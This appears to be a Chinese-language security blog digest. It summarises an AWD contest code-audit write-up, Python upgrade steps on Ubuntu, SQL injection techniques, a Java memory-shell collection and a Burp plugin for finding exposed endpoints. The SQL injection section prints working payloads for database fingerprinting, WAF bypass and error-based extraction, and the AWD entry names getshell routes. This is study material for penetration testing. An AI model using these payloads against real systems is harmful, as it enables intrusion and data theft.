Quan


WEB安全 内网安全 终端对抗 威胁情报

WEB安全
AWD实例:站帮主漏洞挖掘

总的来说,这篇文章主要还是在讲述AWD比赛中,首先应该具备快速代码审计的能力。这里也能看到一些:
1.D盾扫描,尝试找到官方后门
2.代码审计,直接找一些敏感函数 file_put_contents move_uploaded_file 这种能直接getshell的函数
3.任意文件删除+网站重装Getshell unlink


https://mp.weixin.qq.com/s/Uj1QhWJJmu7PGbEJhqlS5w
WEB安全
ubuntu22.04 升级 Python版本

今天在部署某服务的时候发现报错,一查才知道Python低版本居然不支持这么写,火速升级。
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.12
调用就是直接python3.12 main.py
然后还有一件事,就是这个时候只是普通安装,很多Python自带的功能不支持,比如venv
安装一下:
apt-get install python3.12-venv
就可以愉快的使用venv了
python3.12 -m venv venv


https://www.sysgeek.cn/install-python-ubuntu/
WEB安全
高级SQL注入技术

感觉比较精髓的地方在于:
1.介绍了一下如何利用不同的语句来判断后端数据库此问题可能有时候会被当做面试题来问
MYSQL:
' OR 1=1 AND @@version --
PostgreSQL
' OR 1=1 AND version() --
MSSQL
' OR 1=1 AND @@version --
2.绕WAF技术中可以使用||来拼接字符串
' UNION SELECT CHAR(117)||CHAR(115)||CHAR(101)||CHAR(114), CHAR(112)||CHAR(97)||CHAR(115)||CHAR(115) --
或是
' UNION SELECT 'ad'||'min', 'pa'||'ss' --
3.不同的后端数据库报错函数也不尽相同:
MYSQL
' UNION SELECT GTID_SUBSET('abc', 'def') --
pg
' UNION SELECT TO_NUMBER('abc', '999') --
MSSQL
' UNION SELECT CONVERT(INT, 'abc') --
总结:当个备忘录不错,大致阅读了一下,从中提取了一些比较精髓的东西。


https://github.com/ynsmroztas/SQL_Injection-Techniques
WEB安全
一个收集如何打入内存马方式的项目

看着还不错,里面介绍了一些内存马打入的方式,比如Freemarker等等...


https://github.com/achuna33/Memoryshell-JavaALL
WEB安全
自动化发现接口并测试的Burp插件

攻防演练过程中,我们通常会用浏览器访问一些资产,但很多未授权/敏感信息/越权隐匿在已访问接口过html、JS文件等,该插件能让我们发现未授权/敏感信息/越权/登陆接口等。

发现通过某接口可以进行未授权/越权获取到所有的账号密码、私钥、凭证
发现通过某接口可以枚举用户信息、密码修改、用户创建接口
发现登陆后台网址
发现在html、JS中泄漏账号密码或者云主机的Access Key和SecretKey
...

功能

提取网站的URL链接和解析JS文件中的URL链接
前端界面可自行定义敏感关键词、敏感url匹配
界面可配置的开启主动接口探测、敏感信息获取
集成主流攻防场景敏感信息泄漏的指纹库

指纹大杂烩了属于是,来自HAE、APIKET、SweetPotato
还没用,回来试试


https://github.com/shuanx/BurpAPIFinder